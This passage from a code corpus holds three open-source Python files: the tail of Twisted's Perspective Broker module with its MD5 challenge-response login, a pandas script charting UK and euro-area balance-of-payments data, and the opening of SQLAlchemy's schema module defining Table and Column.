d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.errback(self.unserialize(fail))
##
# refcounts
##
def sendDecRef(self, objectID):
"""(internal) Send a DECREF directive.
"""
self.sendCall("decref", objectID)
def proto_decref(self, objectID):
"""(internal) Decrement the reference count of an object.
If the reference count is zero, it will free the reference to this
object.
"""
refs = self.localObjects[objectID].decref()
if refs == 0:
puid = self.localObjects[objectID].object.processUniqueID()
del self.luids[puid]
del self.localObjects[objectID]
self._localCleanup.pop(puid, lambda: None)()
##
# caching
##
def decCacheRef(self, objectID):
"""(internal) Send a DECACHE directive.
"""
self.sendCall("decache", objectID)
def proto_decache(self, objectID):
"""(internal) Decrement the reference count of a cached object.
If the reference count is zero, free the reference, then send an
'uncached' directive.
"""
refs = self.remotelyCachedObjects[objectID].decref()
# log.msg('decaching: %s #refs: %s' % (objectID, refs))
if refs == 0:
lobj = self.remotelyCachedObjects[objectID]
cacheable = lobj.object
perspective = lobj.perspective
# TODO: force_decache needs to be able to force-invalidate a
# cacheable reference.
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
puid = cacheable.processUniqueID()
del self.remotelyCachedLUIDs[puid]
del self.remotelyCachedObjects[objectID]
self.sendCall("uncache", objectID)
def proto_uncache(self, objectID):
"""(internal) Tell the client it is now OK to uncache an object.
"""
# log.msg("uncaching locally %d" % objectID)
obj = self.locallyCachedObjects[objectID]
obj.broker = None
## def reallyDel(obj=obj):
## obj.__really_del__()
## obj.__del__ = reallyDel
del self.locallyCachedObjects[objectID]
def respond(challenge, password):
"""Respond to a challenge.
This is useful for challenge/response authentication.
"""
m = md5()
m.update(password)
hashedPassword = m.digest()
m = md5()
m.update(hashedPassword)
m.update(challenge)
doubleHashedPassword = m.digest()
return doubleHashedPassword
def challenge():
"""I return some random data."""
crap = ''
for x in range(random.randrange(15,25)):
crap = crap + chr(random.randint(65,90))
crap = md5(crap).digest()
return crap
class PBClientFactory(protocol.ClientFactory):
"""
Client factory for PB brokers.
As with all client factories, use with reactor.connectTCP/SSL/etc..
getPerspective and getRootObject can be called either before or
after the connect.
"""
protocol = Broker
unsafeTracebacks = False
def __init__(self, unsafeTracebacks=False, security=globalSecurity):
"""
@param unsafeTracebacks: if set, tracebacks for exceptions will be sent
over the wire.
@type unsafeTracebacks: C{bool}
@param security: security options used by the broker, default to
C{globalSecurity}.
@type security: L{twisted.spread.jelly.SecurityOptions}
"""
self.unsafeTracebacks = unsafeTracebacks
self.security = security
self._reset()
def buildProtocol(self, addr):
"""
Build the broker instance, passing the security options to it.
"""
p = self.protocol(isClient=True, security=self.security)
p.factory = self
return p
def _reset(self):
self.rootObjectRequests = [] # list of deferred
self._broker = None
self._root = None
def _failAll(self, reason):
deferreds = self.rootObjectRequests
self._reset()
for d in deferreds:
d.errback(reason)
def clientConnectionFailed(self, connector, reason):
self._failAll(reason)
def clientConnectionLost(self, connector, reason, reconnecting=0):
"""Reconnecting subclasses should call with reconnecting=1."""
if reconnecting:
# any pending requests will go to next connection attempt
# so we don't fail them.
self._broker = None
self._root = None
else:
self._failAll(reason)
def clientConnectionMade(self, broker):
self._broker = broker
self._root = broker.remoteForName("root")
ds = self.rootObjectRequests
self.rootObjectRequests = []
for d in ds:
d.callback(self._root)
def getRootObject(self):
"""Get root object of remote PB server.
@return: Deferred of the root object.
"""
if self._broker and not self._broker.disconnected:
return defer.succeed(self._root)
d = defer.Deferred()
self.rootObjectRequests.append(d)
return d
def disconnect(self):
"""If the factory is connected, close the connection.
Note that if you set up the factory to reconnect, you will need to
implement extra logic to prevent automatic reconnection after this
is called.
"""
if self._broker:
self._broker.transport.loseConnection()
def _cbSendUsername(self, root, username, password, client):
return root.callRemote("login", username).addCallback(
self._cbResponse, password, client)
def _cbResponse(self, (challenge, challenger), password, client):
return challenger.callRemote("respond", respond(challenge, password), client)
def _cbLoginAnonymous(self, root, client):
"""
Attempt an anonymous login on the given remote root object.
@type root: L{RemoteReference}
@param root: The object on which to attempt the login, most likely
returned by a call to L{PBClientFactory.getRootObject}.
@param client: A jellyable object which will be used as the I{mind}
parameter for the login attempt.
@rtype: L{Deferred}
@return: A L{Deferred} which will be called back with a
L{RemoteReference} to an avatar when anonymous login succeeds, or
which will errback if anonymous login fails.
"""
return root.callRemote("loginAnonymous", client)
def login(self, credentials, client=None):
"""
Login and get perspective from remote PB server.
Currently the following credentials are supported::
L{twisted.cred.credentials.IUsernamePassword}
L{twisted.cred.credentials.IAnonymous}
@rtype: L{Deferred}
@return: A L{Deferred} which will be called back with a
L{RemoteReference} for the avatar logged in to, or which will
errback if login fails.
"""
d = self.getRootObject()
if IAnonymous.providedBy(credentials):
d.addCallback(self._cbLoginAnonymous, client)
else:
d.addCallback(
self._cbSendUsername, credentials.username,
credentials.password, client)
return d
class PBServerFactory(protocol.ServerFactory):
"""
Server factory for perspective broker.
Login is done using a Portal object, whose realm is expected to return
avatars implementing IPerspective. The credential checkers in the portal
should accept IUsernameHashedPassword or IUsernameMD5Password.
Alternatively, any object providing or adaptable to L{IPBRoot} can be
used instead of a portal to provide the root object of the PB server.
"""
unsafeTracebacks = False
# object broker factory
protocol = Broker
def __init__(self, root, unsafeTracebacks=False, security=globalSecurity):
"""
@param root: factory providing the root Referenceable used by the broker.
@type root: object providing or adaptable to L{IPBRoot}.
@param unsafeTracebacks: if set, tracebacks for exceptions will be sent
over the wire.
@type unsafeTracebacks: C{bool}
@param security: security options used by the broker, default to
C{globalSecurity}.
@type security: L{twisted.spread.jelly.SecurityOptions}
"""
self.root = IPBRoot(root)
self.unsafeTracebacks = unsafeTracebacks
self.security = security
def buildProtocol(self, addr):
"""
Return a Broker attached to the factory (as the service provider).
"""
proto = self.protocol(isClient=False, security=self.security)
proto.factory = self
proto.setNameForLocal("root", self.root.rootObject(proto))
return proto
def clientConnectionMade(self, protocol):
# XXX does this method make any sense?
pass
class IUsernameMD5Password(ICredentials):
"""
I encapsulate a username and a hashed password.
This credential is used for username/password over PB. CredentialCheckers
which check this kind of credential must store the passwords in plaintext
form or as a MD5 digest.
@type username: C{str} or C{Deferred}
@ivar username: The username associated with these credentials.
"""
def checkPassword(password):
"""
Validate these credentials against the correct password.
@type password: C{str}
@param password: The correct, plaintext password against which to
check.
@rtype: C{bool} or L{Deferred}
@return: C{True} if the credentials represented by this object match the
given password, C{False} if they do not, or a L{Deferred} which will
be called back with one of these values.
"""
def checkMD5Password(password):
"""
Validate these credentials against the correct MD5 digest of the
password.
@type password: C{str}
@param password: The correct MD5 digest of a password against which to
check.
@rtype: C{bool} or L{Deferred}
@return: C{True} if the credentials represented by this object match the
given digest, C{False} if they do not, or a L{Deferred} which will
be called back with one of these values.
"""
class _PortalRoot:
"""Root object, used to login to portal."""
implements(IPBRoot)
def __init__(self, portal):
self.portal = portal
def rootObject(self, broker):
return _PortalWrapper(self.portal, broker)
registerAdapter(_PortalRoot, Portal, IPBRoot)
class _JellyableAvatarMixin:
"""
Helper class for code which deals with avatars which PB must be capable of
sending to a peer.
"""
def _cbLogin(self, (interface, avatar, logout)):
"""
Ensure that the avatar to be returned to the client is jellyable and
set up disconnection notification to call the realm's logout object.
"""
if not IJellyable.providedBy(avatar):
avatar = AsReferenceable(avatar, "perspective")
puid = avatar.processUniqueID()
# only call logout once, whether the connection is dropped (disconnect)
# or a logout occurs (cleanup), and be careful to drop the reference to
# it in either case
logout = [ logout ]
def maybeLogout():
if not logout:
return
fn = logout[0]
del logout[0]
fn()
self.broker._localCleanup[puid] = maybeLogout
self.broker.notifyOnDisconnect(maybeLogout)
return avatar
class _PortalWrapper(Referenceable, _JellyableAvatarMixin):
"""
Root Referenceable object, used to login to portal.
"""
def __init__(self, portal, broker):
self.portal = portal
self.broker = broker
def remote_login(self, username):
"""
Start of username/password login.
"""
c = challenge()
return c, _PortalAuthChallenger(self.portal, self.broker, username, c)
def remote_loginAnonymous(self, mind):
"""
Attempt an anonymous login.
@param mind: An object to use as the mind parameter to the portal login
call (possibly None).
@rtype: L{Deferred}
@return: A Deferred which will be called back with an avatar when login
succeeds or which will be errbacked if login fails somehow.
"""
d = self.portal.login(Anonymous(), mind, IPerspective)
d.addCallback(self._cbLogin)
return d
class _PortalAuthChallenger(Referenceable, _JellyableAvatarMixin):
"""
Called with response to password challenge.
"""
implements(IUsernameHashedPassword, IUsernameMD5Password)
def __init__(self, portal, broker, username, challenge):
self.portal = portal
self.broker = broker
self.username = username
self.challenge = challenge
def remote_respond(self, response, mind):
self.response = response
d = self.portal.login(self, mind, IPerspective)
d.addCallback(self._cbLogin)
return d
# IUsernameHashedPassword:
def checkPassword(self, password):
return self.checkMD5Password(md5(password).digest())
# IUsernameMD5Password
def checkMD5Password(self, md5Password):
md = md5()
md.update(md5Password)
md.update(self.challenge)
correct = md.digest()
return self.response == correct
__all__ = [
# Everything from flavors is exposed publically here.
'IPBRoot', 'Serializable', 'Referenceable', 'NoSuchMethod', 'Root',
'ViewPoint', 'Viewable', 'Copyable', 'Jellyable', 'Cacheable',
'RemoteCopy', 'RemoteCache', 'RemoteCacheObserver', 'copyTags',
'setUnjellyableForClass', 'setUnjellyableFactoryForClass',
'setUnjellyableForClassTree',
'setCopierForClass', 'setFactoryForClass', 'setCopierForClassTree',
'MAX_BROKER_REFS', 'portno',
'ProtocolError', 'DeadReferenceError', 'Error', 'PBConnectionLost',
'RemoteMethod', 'IPerspective', 'Avatar', 'AsReferenceable',
'RemoteReference', 'CopyableFailure', 'CopiedFailure', 'failure2Copyable',
'Broker', 'respond', 'challenge', 'PBClientFactory', 'PBServerFactory',
'IUsernameMD5Password',
]
|
Varriount/Colliberation
|
libs/twisted/spread/pb.py
|
Python
|
mit
| 48,450
|
__author__ = 'brendan'
import main
import pandas as pd
import numpy as np
from datetime import datetime as dt
from matplotlib import pyplot as plt
import random
import itertools
import time
import dateutil
from datetime import timedelta
cols = ['BoP FA Net', 'BoP FA OI Net', 'BoP FA PI Net', 'CA % GDP']
raw_data = pd.read_csv('raw_data/BoP_UK.csv', index_col=0, parse_dates=True)
data = pd.DataFrame(raw_data.iloc[:240, :4].fillna(0)).astype(float)
data.columns = cols
data.index = pd.date_range('1955-01-01', '2014-12-31', freq='Q')
raw_eur = pd.read_csv('raw_data/EUR_CA.csv', index_col=0, parse_dates=True)
raw_eur = raw_eur[::-1]
raw_eur.index = pd.date_range('1999-01-01', '2015-03-01', freq='M')
raw_eur.index.name = 'Date'
raw_eur = raw_eur.resample('Q', how='sum')
data_eur_gdp_q = pd.read_csv('raw_data/MACRO_DATA.csv', index_col=0, parse_dates=True)['EUR_GDP_Q'].dropna()
data_eur_gdp_q.columns = ['EUR_GDP_Q']
data_eur_gdp_q.index.name = 'Date'
data_eur_gdp_q = data_eur_gdp_q.loc['1999-03-31':]
end_gdp = pd.DataFrame(data=[data_eur_gdp_q.iloc[-1], data_eur_gdp_q.iloc[-1],
data_eur_gdp_q.iloc[-1], data_eur_gdp_q.iloc[-1]],
index=pd.date_range('2014-06-30', '2015-03-31', freq='Q'))
eur_gdp = pd.concat([data_eur_gdp_q, end_gdp])
eur_gdp.columns = ['EUR_CA']
eur_ca = raw_eur.div(eur_gdp)
eur_ca.columns = ['EUR CA']
uk_ca = data['CA % GDP'] / 100.0
uk_ca.columns = ['UK CA']
uk_fa = pd.DataFrame(data.iloc[:, :3])
uk_gdp = pd.read_csv('raw_data/MACRO_DATA.csv', index_col=0, parse_dates=True)['UK_GDP_Q'].dropna()
uk_gdp_final = pd.concat([uk_gdp, pd.DataFrame(data=[uk_gdp.iloc[-1], uk_gdp.iloc[-1]],
index=pd.date_range('2014-09-01', '2014-12-31', freq='Q'))])
uk_fa_gdp = pd.DataFrame(index=uk_gdp_final.index)
uk_fa_gdp['UK FA Net'] = uk_fa['BoP FA Net'] / uk_gdp_final
uk_fa_gdp['UK FA OI'] = uk_fa['BoP FA OI Net'] / uk_gdp_final
uk_fa_gdp['UK FA PI'] = uk_fa['BoP FA PI Net'] / uk_gdp_final
print(eur_gdp)
eur_fa = pd.read_csv('raw_data/EUR_FA.csv', index_col=0, header=0, parse_dates=True).dropna().astype(float)
eur_fa = eur_fa.iloc[::-1]
print(eur_fa)
eur_fa.index = pd.date_range('2009-01-01', '2015-02-28', freq='M')
eur_fa = eur_fa.resample('Q', how='sum')
print(eur_fa)
eur_fa_gdp = pd.DataFrame(index=eur_gdp.index)
eur_fa_gdp['EUR FA Net'] = eur_fa['EUR FA Net'] / eur_gdp['EUR_CA'].loc['2009-03-31':]
eur_fa_gdp['EUR FA OI'] = eur_fa['EUR FA OI'] / eur_gdp['EUR_CA'].loc['2009-03-31':]
eur_fa_gdp['EUR FA PI'] = eur_fa['EUR FA PI'] / eur_gdp['EUR_CA'].loc['2009-03-31':]
print(eur_fa_gdp)
fig, ax = plt.subplots()
uk_ca.plot(ax=ax, label='UK CA')
eur_ca.plot(ax=ax, label='EUR CA')
ax.set_title('Current Account %GDP')
plt.legend()
uk_fa_gdp_4q = pd.rolling_mean(uk_fa_gdp, window=4)
fig2, ax2 = plt.subplots()
uk_fa_gdp_4q.plot(ax=ax2)
#eur_fa_gdp.plot(ax=ax2)
plt.legend()
ax2.set_title('UK Financial Account % GDP (4Q Avg.)')
#plt.show()
dates = pd.DataFrame(index=pd.date_range('1960-03-31', '2015-01-01', freq='Q'))
print(dates)
dates.to_csv('raw_data/US_BoP.csv')
|
boneil3/backtest
|
BoP.py
|
Python
|
mit
| 3,114
|
# sqlalchemy/schema.py
# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The schema module provides the building blocks for database metadata.
Each element within this module describes a database entity which can be
created and dropped, or is otherwise part of such an entity. Examples include
tables, columns, sequences, and indexes.
All entities are subclasses of :class:`~sqlalchemy.schema.SchemaItem`, and as
defined in this module they are intended to be agnostic of any vendor-specific
constructs.
A collection of entities are grouped into a unit called
:class:`~sqlalchemy.schema.MetaData`. MetaData serves as a logical grouping of
schema elements, and can also be associated with an actual database connection
such that operations involving the contained elements can contact the database
as needed.
Two of the elements here also build upon their "syntactic" counterparts, which
are defined in :class:`~sqlalchemy.sql.expression.`, specifically
:class:`~sqlalchemy.schema.Table` and :class:`~sqlalchemy.schema.Column`.
Since these objects are part of the SQL expression language, they are usable
as components in SQL expressions.
"""
import re, inspect
from sqlalchemy import exc, util, dialects
from sqlalchemy.sql import expression, visitors
from sqlalchemy import event, events
ddl = util.importlater("sqlalchemy.engine", "ddl")
sqlutil = util.importlater("sqlalchemy.sql", "util")
url = util.importlater("sqlalchemy.engine", "url")
sqltypes = util.importlater("sqlalchemy", "types")
__all__ = ['SchemaItem', 'Table', 'Column', 'ForeignKey', 'Sequence', 'Index',
'ForeignKeyConstraint', 'PrimaryKeyConstraint', 'CheckConstraint',
'UniqueConstraint', 'DefaultGenerator', 'Constraint', 'MetaData',
'ThreadLocalMetaData', 'SchemaVisitor', 'PassiveDefault',
'DefaultClause', 'FetchedValue', 'ColumnDefault', 'DDL',
'CreateTable', 'DropTable', 'CreateSequence', 'DropSequence',
'AddConstraint', 'DropConstraint',
]
__all__.sort()
RETAIN_SCHEMA = util.symbol('retain_schema')
class SchemaItem(events.SchemaEventTarget, visitors.Visitable):
"""Base class for items that define a database schema."""
__visit_name__ = 'schema_item'
quote = None
def _init_items(self, *args):
"""Initialize the list of child items for this SchemaItem."""
for item in args:
if item is not None:
item._set_parent_with_dispatch(self)
def get_children(self, **kwargs):
"""used to allow SchemaVisitor access"""
return []
def __repr__(self):
return "%s()" % self.__class__.__name__
@util.memoized_property
def info(self):
return {}
def _get_table_key(name, schema):
if schema is None:
return name
else:
return schema + "." + name
class Table(SchemaItem, expression.TableClause):
"""Represent a table in a database.
e.g.::
mytable = Table("mytable", metadata,
Column('mytable_id', Integer, primary_key=True),
Column('value', String(50))
)
The :class:`.Table` object constructs a unique instance of itself based on its
name and optionl schema name within the given :class:`.MetaData` object.
Calling the :class:`.Table`
constructor with the same name and same :class:`.MetaData` argument
a second time will return the *same* :class:`.Table` object - in this way
the :class:`.Table` constructor acts as a registry function.
Constructor arguments are as follows:
:param name: The name of this table as represented in the database.
This property, along with the *schema*, indicates the *singleton
identity* of this table in relation to its parent :class:`.MetaData`.
Additional calls to :class:`.Table` with the same name, metadata,
and schema name will return the same :class:`.Table` object.
Names which contain no upper case characters
will be treated as case insensitive names, and will not be quoted
unless they are a reserved word. Names with any number of upper
case characters will be quoted and sent exactly. Note that this
behavior applies even for databases which standardize upper
case names as case insensitive such as Oracle.
:param metadata: a :class:`.MetaData` object which will contain this
table. The metadata is used as a point of association of this table
with other tables which are referenced via foreign key. It also
may be used to associate this table with a particular
:class:`~sqlalchemy.engine.base.Connectable`.
:param \*args: Additional positional arguments are used primarily
to add the list of :class:`.Column` objects contained within this
table. Similar to the style of a CREATE TABLE statement, other
:class:`.SchemaItem` constructs may be added here, including
:class:`.PrimaryKeyConstraint`, and :class:`.ForeignKeyConstraint`.
:param autoload: Defaults to False: the Columns for this table should
be reflected from the database. Usually there will be no Column
objects in the constructor if this property is set.
:param autoload_with: If autoload==True, this is an optional Engine
or Connection instance to be used for the table reflection. If
``None``, the underlying MetaData's bound connectable will be used.
:param extend_existing: When ``True``, indicates that if this Table is already
present in the given :class:`.MetaData`, apply further arguments within
the constructor to the existing :class:`.Table`.
If extend_existing or keep_existing are not set, an error is
raised if additional table modifiers are specified when
the given :class:`.Table` is already present in the :class:`.MetaData`.
:param implicit_returning: True by default - indicates that
RETURNING can be used by default to fetch newly inserted primary key
values, for backends which support this. Note that
create_engine() also provides an implicit_returning flag.
:param include_columns: A list of strings indicating a subset of
columns to be loaded via the ``autoload`` operation; table columns who
aren't present in this list will not be represented on the resulting
``Table`` object. Defaults to ``None`` which indicates all columns
should be reflected.
:param info: A dictionary which defaults to ``{}``. A space to store
application specific data. This must be a dictionary.
:param keep_existing: When ``True``, indicates that if this Table
is already present in the given :class:`.MetaData`, ignore
further arguments within the constructor to the existing
:class:`.Table`, and return the :class:`.Table` object as
originally created. This is to allow a function that wishes
to define a new :class:`.Table` on first call, but on
subsequent calls will return the same :class:`.Table`,
without any of the declarations (particularly constraints)
being applied a second time. Also see extend_existing.
If extend_existing or keep_existing are not set, an error is
raised if additional table modifiers are specified when
the given :class:`.Table` is already present in the :class:`.MetaData`.
:param listeners: A list of tuples of the form ``(<eventname>, <fn>)``
which will be passed to :func:`.event.listen` upon construction.
This alternate hook to :func:`.event.listen` allows the establishment
of a listener function specific to this :class:`.Table` before
the "autoload" process begins. Particularly useful for
the :meth:`.events.column_reflect` event::
def listen_for_reflect(table, column_info):
"handle the column reflection event"
# ...
t = Table(
'sometable',
autoload=True,
listeners=[
('column_reflect', listen_for_reflect)
])
:param mustexist: When ``True``, indicates that this Table must already
be present in the given :class:`.MetaData`` collection, else
an exception is raised.
:param prefixes:
A list of strings to insert after CREATE in the CREATE TABLE
statement. They will be separated by spaces.
:param quote: Force quoting of this table's name on or off, corresponding
to ``True`` or ``False``. When left at its default of ``None``,
the column identifier will be quoted according to whether the name is
case sensitive (identifiers with at least one upper case character are
treated as case sensitive), or if it's a reserved word. This flag
is only needed to force quoting of a reserved word which is not known
by the SQLAlchemy dialect.
:param quote_schema: same as 'quote' but applies to the schema identifier.
:param schema: The *schema name* for this table, which is required if
the table resides in a schema other than the default selected schema
for the engine's database connection. Defaults to ``None``.
:param useexisting: Deprecated. Use extend_existing.
"""
__visit_name__ = 'table'
def __new__(cls, *args, **kw):
if not args:
# python3k pickle seems to call this
return object.__new__(cls)
try:
name, metadata, args = args[0], args[1], args[2:]
except IndexError:
raise TypeError("Table() takes at least two arguments")
schema = kw.get('schema', None)
keep_existing = kw.pop('keep_existing', False)
extend_existing = kw.pop('extend_existing', False)
if 'useexisting' in kw:
util.warn_deprecated("useexisting is deprecated. Use extend_existing.")
if extend_existing:
raise exc.ArgumentError("useexisting is synonymous "
"with extend_existing.")
extend_existing = kw.pop('useexisting', False)
if keep_existing and extend_existing:
raise exc.ArgumentError("keep_existing and extend_existing "
"are mutually exclusive.")
mustexist = kw.pop('mustexist', False)
key = _get_table_key(name, schema)
if key in metadata.tables:
if not keep_existing and not extend_existing and bool(args):
raise exc.InvalidRequestError(
"Table '%s' is already defined for this MetaData "
"instance. Specify 'extend_existing=True' "
"to redefine "
"options and columns on an "
"existing Table object." % key)
table = metadata.tables[key]
if extend_existing:
table._init_existing(*args, **kw)
return table
else:
if mustexist:
raise exc.InvalidRequestError(
"Table '%s' not defined" % (key))
table = object.__new__(cls)
table.dispatch.before_parent_attach(table, metadata)
metadata._add_table(name, schema, table)
try:
table._init(name, metadata, *args, **kw)
table.dispatch.after_parent_attach(table, metadata)
return table
except:
metadata._remove_table(name, schema)
raise
def __init__(self, *args, **kw):
"""Constructor for :class:`~.schema.Table`.
This method is a no-op. See the top-level
documentation for :class:`~.schema.Table`
for constructor arguments.
"""
# __init__ is overridden to prevent __new__ from
# calling the superclass constructor.
def _init(self, name, metadata, *args, **kwargs):
super(Table, self).__init__(name)
self.metadata = metadata
self.schema = kwargs.pop('schema', None)
self.indexes = set()
self.constraints = set()
self._columns = expression.ColumnCollection()
PrimaryKeyConstraint()._set_parent_with_dispatch(self)
self.foreign_keys = set()
self._extra_dependencies = set()
self.kwargs = {}
if self.schema is not None:
self.fullname = "%s.%s" % (self.schema, self.name)
else:
self.fullname = self.name
autoload = kwargs.pop('autoload', False)
autoload_with = kwargs.pop('autoload_with', None)
include_columns = kwargs.pop('include_columns', None)
self.implicit_returning = kwargs.pop('implicit_returning', True)
self.quote = kwargs.pop('quote', None)
self.quote_schema = kwargs.pop('quote_schema', None)
if 'info' in kwargs:
self.info = kwargs.pop('info')
if 'listeners' in kwargs:
listeners = kwargs.pop('listeners')
for evt, fn in listeners:
event.listen(self, evt, fn)
self._prefixes = kwargs.pop('prefixes', [])
self._extra_kwargs(**kwargs)
# load column definitions from the database if 'autoload' is defined
# we do it after the table is in the singleton dictionary to support
# circular foreign keys
if autoload:
if autoload_with:
autoload_with.run_callable(
autoload_with.dialect.reflecttable,
self, include_columns
)
else:
bind = _bind_or_error(metadata,
msg="No engine is bound to this Table's MetaData. "
"Pass an engine to the Table via "
"autoload_with=<someengine>, "
"or associate the MetaData with an engine via "
"metadata.bind=<someengine>")
bind.run_callable(
bind.dialect.reflecttable,
self, include_columns
)
# initialize all the column, etc. objects. done after reflection to
# allow user-overrides
self._init_items(*args)
@property
def _sorted_constraints(self):
"""Return the set of constraints as a list, sorted by creation order."""
return sorted(self.constraints, key=lambda c:c._creation_order)
def _init_existing(self, *args, **kwargs):
autoload = kwargs.pop('autoload', False)
autoload_with = kwargs.pop('autoload_with', None)
schema = kwargs.pop('schema', None)
if schema and schema != self.schema:
raise exc.ArgumentError(
"Can't change schema of existing table from '%s' to '%s'",
(self.schema, schema))
include_columns = kwargs.pop('include_columns', None)
if include_columns:
for c in self.c:
if c.name not in include_columns:
self._columns.remove(c)
for key in ('quote', 'quote_schema'):
if key in kwargs:
setattr(self, key, kwargs.pop(key))
if 'info' in kwargs:
self.info = kwargs.pop('info')
self._extra_kwargs(**kwargs)
self._init_items(*args)
def _extra_kwargs(self, **kwargs):
# validate remaining kwargs that they all specify DB prefixes
if len([k for k in kwargs
if not re.match(
r'^(?:%s)_' %
'|'.join(dialects.__all__), k
)
]):
raise TypeError(
"Invalid argument(s) for Table: %r" % kwargs.keys())
self.kwargs.update(kwargs)
def _init_collections(self):
pass
@util.memoized_property
def _autoincrement_column(self):
for col in self.primary_key:
if col.autoincrement and \
issubclass(col.type._type_affinity, sqltypes.Integer) and \
not col.foreign_keys and \
isinstance(col.default, (type(None), Sequence)) and \
(col.server_default is None or col.server_default.reflected):
return col
@property
def key(self):
return _get_table_key(self.name, self.schema)
def __repr__(self):
return "Table(%s)" % ', '.join(
[repr(self.name)] + [repr(self.metadata)] +
[repr(x) for x in self.columns] +
["%s=%s" % (k, repr(getattr(self, k))) for k in ['schema']])
def __str__(self):
return _get_table_key(self.description, self.schema)
@property
def bind(self):
"""Return the connectable associated with this Table."""
return self.metadata and self.metadata.bind or None
def add_is_dependent_on(self, table):
"""Add a 'dependency' for this Table.
This is another Table object which must be created
first before this one can, or dropped after this one.
Usually, dependencies between tables are determined via
ForeignKey objects. However, for other situations that
create dependencies outside of foreign keys (rules, inheriting),
this method can manually establish such a link.
"""
self._extra_dependencies.add(table)
def append_column(self, column):
"""Append a :class:`~.schema.Column` to this :class:`~.schema.Table`.
The "key" of the newly added :class:`~.schema.Column`, i.e. the
value of its ``.key`` attribute, will then be available
in the ``.c`` collection of this :class:`~.schema.Table`, and the
column definition will be included in any CREATE TABLE, SELECT,
UPDATE, etc. statements generated from this :class:`~.schema.Table`
construct.
Note that this does **not** change the definition of the table
as it exists within any underlying database, assuming that
table has already been created in the database. Relational
databases support the addition of columns to existing tables
using the SQL ALTER command, which would need to be
emitted for an already-existing table that doesn't contain
the newly added column.
"""
column._set_parent_with_dispatch(self)
def append_constraint(self, constraint):
"""Append a :class:`~.schema.Constraint` to this :class:`~.schema.Table`.
This has the effect of the constraint being included in any
future CREATE TABLE statement, assuming specific DDL creation
events have not been associated with the given :class:`~.schema.Constraint`
object.
Note that this does **not** produce the constraint within the
relational database automatically, for a table that already exists
in the database. To add a constraint to an
existing relational database table, the SQL ALTER command must
be used. SQLAlchemy also provides the :class:`.AddConstraint` construct
which can produce this SQL when invoked as an executable clause.
"""
constraint._set_parent_with_dispatch(self)
def append_ddl_listener(self, event_name, listener):
"""Append a DDL event listener to this ``Table``.
Deprecated. See :class:`.DDLEvents`.
"""
def adapt_listener(target, connection, **kw):
listener(event_name, target, connection, **kw)
event.listen(self, "" + event_name.replace('-', '_'), adapt_listener)
def _set_parent(self, metadata):
metadata._add_table(self.name, self.schema, self)
self.metadata = metadata
def get_children(self, column_collections=True,
schema_visitor=False, **kw):
if not schema_visitor:
return expression.TableClause.get_children(
self, column_collections=column_collections, **kw)
else:
if column_collections:
return list(self.columns)
else:
return []
def exists(self, bind=None):
"""Return True if this table exists."""
if bind is None:
bind = _bind_or_error(self)
return bind.run_callable(bind.dialect.has_table,
self.name, schema=self.schema)
def create(self, bind=None, checkfirst=False):
"""Issue a ``CREATE`` statement for this
:class:`.Table`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.create_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator,
self,
checkfirst=checkfirst)
def drop(self, bind=None, checkfirst=False):
"""Issue a ``DROP`` statement for this
:class:`.Table`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.drop_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper,
self,
checkfirst=checkfirst)
def tometadata(self, metadata, schema=RETAIN_SCHEMA):
"""Return a copy of this :class:`.Table` associated with a different
:class:`.MetaData`.
E.g.::
# create two metadata
meta1 = MetaData('sqlite:///querytest.db')
meta2 = MetaData()
# load 'users' from the sqlite engine
users_table = Table('users', meta1, autoload=True)
# create the same Table object for the plain metadata
users_table_2 = users_table.tometadata(meta2)
"""
if schema is RETAIN_SCHEMA:
schema = self.schema
key = _get_table_key(self.name, schema)
if key in metadata.tables:
util.warn("Table '%s' already exists within the given "
"MetaData - not copying." % self.description)
return metadata.tables[key]
args = []
for c in self.columns:
args.append(c.copy(schema=schema))
for c in self.constraints:
args.append(c.copy(schema=schema))
table = Table(
self.name, metadata, schema=schema,
*args, **self.kwargs
)
for index in self.indexes:
# skip indexes that would be generated
# by the 'index' flag on Column
if len(index.columns) == 1 and \
list(index.columns)[0].index:
continue
Index(index.name,
unique=index.unique,
*[table.c[col] for col in index.columns.keys()],
**index.kwargs)
table.dispatch._update(self.dispatch)
return table
class Column(SchemaItem, expression.ColumnClause):
"""Represents a column in a database table."""
__visit_name__ = 'column'
def __init__(self, *args, **kwargs):
"""
Construct a new ``Column`` object.
:param name: The name of this column as represented in the database.
This argument may be the first positional argument, or specified
via keyword.
Names which contain no upper case characters
will be treated as case insensitive names, and will not be quoted
unless they are a reserved word. Names with any number of upper
case characters will be quoted and sent exactly. Note that this
behavior applies even for databases which standardize upper
case names as case insensitive such as Oracle.
The name field may be omitted at construction time and applied
later, at any time before the Column is associated with a
:class:`.Table`. This is to support convenient
usage within the :mod:`~sqlalchemy.ext.declarative` extension.
:param type\_: The column's type, indicated using an instance which
subclasses :class:`~sqlalchemy.types.TypeEngine`. If no arguments
are required for the type, the class of the type can be sent
as well, e.g.::
# use a type with arguments
Column('data', String(50))
# use no arguments
Column('level', Integer)
The ``type`` argument may be the second positional argument
or specified by keyword.
There is partial support for automatic detection of the
type based on that of a :class:`.ForeignKey` associated
with this column, if the type is specified as ``None``.
However, this feature is not fully implemented and
may not function in all cases.
:param \*args: Additional positional arguments include various
:class:`.SchemaItem` derived constructs which will be applied
as options to the column. These include instances of
:class:`.Constraint`, :class:`.ForeignKey`, :class:`.ColumnDefault`,
and :class:`.Sequence`. In some cases an equivalent keyword
argument is available such as ``server_default``, ``default``
and ``unique``.
:param autoincrement: This flag may be set to ``False`` to
indicate an integer primary key column that should not be
considered to be the "autoincrement" column, that is
the integer primary key column which generates values
implicitly upon INSERT and whose value is usually returned
via the DBAPI cursor.lastrowid attribute. It defaults
to ``True`` to satisfy the common use case of a table
with a single integer primary key column. If the table
has a composite primary key consisting of more than one
integer column, set this flag to True only on the
column that should be considered "autoincrement".
The setting *only* has an effect for columns which are:
* Integer derived (i.e. INT, SMALLINT, BIGINT).
* Part of the primary key
* Are not referenced by any foreign keys
* have no server side or client side defaults (with the exception
